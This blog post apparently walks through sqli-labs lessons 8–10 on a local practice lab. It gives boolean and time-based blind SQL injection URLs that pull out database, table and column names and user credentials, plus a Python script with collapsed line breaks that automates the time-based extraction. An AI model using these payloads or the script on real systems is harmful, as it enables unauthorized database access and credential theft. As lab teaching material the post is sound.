当前位置: 首页 > news >正文

sqli-lab靶场学习(二)——Less8-10(盲注、时间盲注)

news 来源:原创 2024/9/20 0:15:22

Less8

第八关依然是先看一般状态

http://localhost/sqli-labs/Less-8/?id=1

然后用单引号闭合:

http://localhost/sqli-labs/Less-8/?id=1'

这关的问题在于报错是不显示,那没办法通过上篇文章的updatexml大法处理。对于这种情况,需要用“盲注”,说白了就是猜,例如如下:

http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd

这里猜数据库第一个字幕是s,当然我们不是神,肯定不可能一猜就猜中。一般来说就得一个一个猜。当然我们可以利用二分查找的思路,通过大于小于的方式,确定并逐步缩小区间,这样可以减少查询的次数。

我们通过这样的方式,可以顺利查出所属数据库,另外还得先查字符串的长度,确定了长度再一个一个字符盲注尝试:

http://localhost/sqli-labs/Less-8/?id=1' and LENGTH(DATABASE())=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 2, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 3, 1)='c' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 4, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 5, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 6, 1)='i' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 7, 1)='t' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 8, 1)='y' -- asd

 一通操作下来,逐个字符对比,就能试出是security这个。同样的方法,可以找出在information_schema.tables中第四个表的表名是users:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s' -- asd

这里都是忽略了一个一个表,一个一个字符尝试的过程。

之后用同样的方式,盲注找出列名:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e' -- asdhttp://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r' -- asd
http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d' -- asd

盲注后匹配第四和第五个列名是username和password。 

之后盲注找出用户名和密码:

http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(username) from users limit 0,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 1, 1))=68 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 2, 1))=117 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 3, 1))=109 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 4, 1))=98 -- asdhttp://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(password) from users limit 0,1)=4 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 1, 1))=68 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 2, 1))=117 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 3, 1))=109 -- asd
http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 4, 1))=98 -- asd

这里用了ascii码来匹配,因为账号密码是有大小写区分,但mysql默认配置里是不区分大小写。前面数据库名、表名、列名也可以用ascii码去匹配。如果数据库本身是区分大小写的话就一定要用ascii码来匹配。

Less9

第九关难度更大了,会发现无论输入什么闭合,页面返回都一样。这代表这个页面是无论对错,返回的东西都一样。那这种情况怎么办?这里要用到“时间盲注”。时间盲注具体的做法是,如果注入判断条件正确,则sleep一段时间,如果错误就立即返回。这样通过看请求是否sleep就能判断之前的条件是否正确。而注入条件则是第八关的内容。

举个例子当我们输入:

http://localhost/sqli-labs/Less-9/?id=1' and if(1=1,sleep(2),1)  -- asd

浏览器左上角会转圈圈大概2秒,通过浏览器开发者工具f12

看到等待了2秒服务器才返回。这就是时间盲注。

所以可以利用同样的语句找出数据库名:

http://localhost/sqli-labs/Less-9/?id=1' and if(LENGTH(DATABASE())=8, sleep(2), 1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 1, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 2, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 3, 1)='c', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 4, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 5, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 6, 1)='i', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 7, 1)='t', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 8, 1)='y', sleep(2),1) -- asd

找出表名:

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s', sleep(2),1) -- asd

找出列名:

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e', sleep(2),1) -- asdhttp://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8 -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r', sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d', sleep(2),1) -- asd

最后找出账号名密码:

http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(username) from users limit 0,1)=4, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 4, 1))=98, sleep(2),1) -- asdhttp://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(passowrd) from users limit 0,1)=4, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 4, 1))=98, sleep(2),1) -- asd

除了添加了if条件和sleep之外,基本和第八关一致,效果就不另外展示了。

时间盲注脚本

一个一个手动试,除非本身知道答案,否则太费劲了,所以可以用python脚本处理

import requests
import timedb_ascii = [48,49,50,51,52,53,54,55,56,57,58,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,95,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122]user_pwd_ascii = []def get_method(url_params):t1 = time.time()#print(url_params)r = requests.get('http://localhost/sqli-labs/Less-8', params=url_params)t2 = time.time()if t2-t1 > 2:return Truereturn Falsedef check_database():##数据库名长度database_len = 0for i in range(100):params = {'id': "1' and if(LENGTH(DATABASE())=" + str(i) + ", sleep(2), 1) -- asd"}if get_method(params):database_len = iprint('database name length is: ' + str(database_len))breakfor j in range(database_len):for db_char in db_ascii:params = {'id': "1' and if(ASCII(substr(database(), " + str(j + 1) + ", 1))=" + str(db_char) + ", sleep(2),1) -- asd"}if get_method(params):print(chr(db_char), end='')breaktime.sleep(0.05)print('')def check_table():##表数table_num = 0for i in range(100):num_params = {'id': "1' and if((select count(1) from information_schema.tables where table_schema=database())=" +str(i) + ", sleep(2),1) -- asd"}if get_method(num_params):table_num = iprint('table number  is: ' + str(table_num))breakfor k in range(table_num):##表名长度table_name_len = 0for l in range(100):tb_len_params = {'id': "1' and if((select LENGTH(table_name) from information_schema.tables where " +"table_schema=database() limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}if get_method(tb_len_params):table_name_len = lprint('table name length is: ' + str(table_name_len))break##表名for j in range(table_name_len):for tb_char in db_ascii:tb_name_params = {'id': "1' and if(ASCII(substr((select table_name from information_schema.tables " +"where table_schema=database() limit " + str(k) + ",1), " + str(j+1) + ", 1))=" + str(tb_char) + ", " +"sleep(2),1) -- asd"}if get_method(tb_name_params):print(chr(tb_char), end='')breaktime.sleep(0.05)print('')def check_column(tb_name):##列数col_num = 0for i in range(100):num_params = {'id': "1' and if((select count(1) from information_schema.columns where table_name='" + tb_name + "')=" +str(i) + ", sleep(2),1) -- asd"}if get_method(num_params):col_num = iprint('column number  is: ' + str(col_num))breakfor k in range(col_num):##列名长度col_name_len = 0for l in range(100):col_len_params = {'id': "1' and if((select LENGTH(column_name) from information_schema.columns where " +"table_name='" + tb_name + "' limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}if get_method(col_len_params):col_name_len = lprint('column name length is: ' + str(col_name_len))break##列名for j in range(col_name_len):for col_char in db_ascii:col_name_params = {'id': "1' and if(ASCII(substr((select column_name from information_schema.columns " +"where table_name='" + tb_name + "' limit " + str(k) + ",1), " + str(j + 1) + ", 1))=" +str(col_char) + ", sleep(2),1) -- asd"}if get_method(col_name_params):print(chr(col_char), end='')breaktime.sleep(0.05)print('')def check_username_password(tb_name, username_col, password_col, start, end):for i in range(start, end):#用户名长度username_len = 0for j in range(100):username_len_params = {'id': "1' and if((select LENGTH(" + username_col + ") from " + tb_name +" limit " + str(i) + ", 1)=" + str(j) + ", sleep(2),1) -- asd"}if get_method(username_len_params):username_len = jprint('username length is: ' + str(j))breakfor k in range(username_len):for username_char in range(33,127):username_params = {'id': "1' and if(ASCII(substr((select " + username_col + " from " + tb_name +" limit " + str(i) + ",1), " + str(k+1) + ", 1))=" + str(username_char) +", sleep(2),1) -- asd"}if get_method(username_params):print(chr(username_char), end='')breaktime.sleep(0.05)print('')# 密码长度password_len = 0for l in range(100):password_len_params = {'id': "1' and if((select LENGTH(" + password_col + ") from " + tb_name +" limit " + str(i) + ", 1)=" + str(l) + ", sleep(2),1) -- asd"}if get_method(password_len_params):password_len = lprint('password length is: ' + str(l))breakfor m in range(password_len):for password_char in range(33,127):password_params = {'id': "1' and if(ASCII(substr((select " + password_col + " from " + tb_name +" limit " + str(i) + ",1), " + str(m+1) + ", 1))=" + str(password_char) +", sleep(2),1) -- asd"}if get_method(password_params):print(chr(password_char), end='')breaktime.sleep(0.05)print('')if __name__ == '__main__':check_database()check_table()#check_column('users')#check_username_password('users', 'username', 'password', 0, 2)

写了一个穷举式的,读者感兴趣可以写个二分查找会更快。其中查列名和用户名密码的函数需要在前面的函数中获取到表名和列名,才能作为传参。

Less10

第十关和第九关除了闭合区间变成双引号外,其余一致,就不另外写了。

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 前端开发之迭代器模式
  • 从数据仓库到数据中台再到数据飞轮:我了解的数据技术进化史
  • 代码管理-使用TortoiseGit同步项目到Github/Gitee
  • 运行npm install 时,卡在sill idealTree buildDeps没有反应
  • SCRM电商管理后台Axure高保真原型 源文件
  • 电脑提示丢失mfc140u.dll的详细解决方案,mfc140u.dll文件是什么
  • C++初阶:STL详解(五)——vector的模拟实现
  • 初中生物--7.生物圈中的绿色植物(二)
  • java项目之在线考试与学习交流网页平台源码(springboot)
  • QT 串口上位机读卡显示
  • 枚举(not二分)
  • TCP 和 UDP 协议的区别?
  • MySQL之约束
  • Python列表循环的两种方法
  • 图书管理系统(面向对象的编程练习)
  • 实现windows 窗体的自己画,网上摘抄的,学习了
  • 【面试系列】之二:关于js原型
  • 2017届校招提前批面试回顾
  • AHK 中 = 和 == 等比较运算符的用法
  • Android组件 - 收藏集 - 掘金
  • Angular 2 DI - IoC DI - 1
  • CSS魔法堂:Absolute Positioning就这个样
  • JavaScript 是如何工作的:WebRTC 和对等网络的机制!
  • learning koa2.x
  • SSH 免密登录
  • 从tcpdump抓包看TCP/IP协议
  • 关于Android中设置闹钟的相对比较完善的解决方案
  • 记录:CentOS7.2配置LNMP环境记录
  • 今年的LC3大会没了?
  • 微信小程序:实现悬浮返回和分享按钮
  • 我建了一个叫Hello World的项目
  • 详解移动APP与web APP的区别
  • 学习Vue.js的五个小例子
  • 运行时添加log4j2的appender
  • 走向全栈之MongoDB的使用
  • 深度学习之轻量级神经网络在TWS蓝牙音频处理器上的部署
  • scrapy中间件源码分析及常用中间件大全
  • 继 XDL 之后,阿里妈妈开源大规模分布式图表征学习框架 Euler ...
  • 数据库巡检项
  • 昨天1024程序员节,我故意写了个死循环~
  • ​力扣解法汇总946-验证栈序列
  • # Swust 12th acm 邀请赛# [ A ] A+B problem [题解]
  • # Swust 12th acm 邀请赛# [ E ] 01 String [题解]
  • #1015 : KMP算法
  • #includecmath
  • #我与Java虚拟机的故事#连载17:我的Java技术水平有了一个本质的提升
  • ()、[]、{}、(())、[[]]命令替换
  • (一)80c52学习之旅-起始篇
  • .htaccess配置重写url引擎
  • .net core 6 集成和使用 mongodb
  • .net core webapi Startup 注入ConfigurePrimaryHttpMessageHandler
  • .NET Framework Client Profile - a Subset of the .NET Framework Redistribution
  • .NET 反射的使用
  • .NET技术成长路线架构图
  • .NET开发不可不知、不可不用的辅助类(一)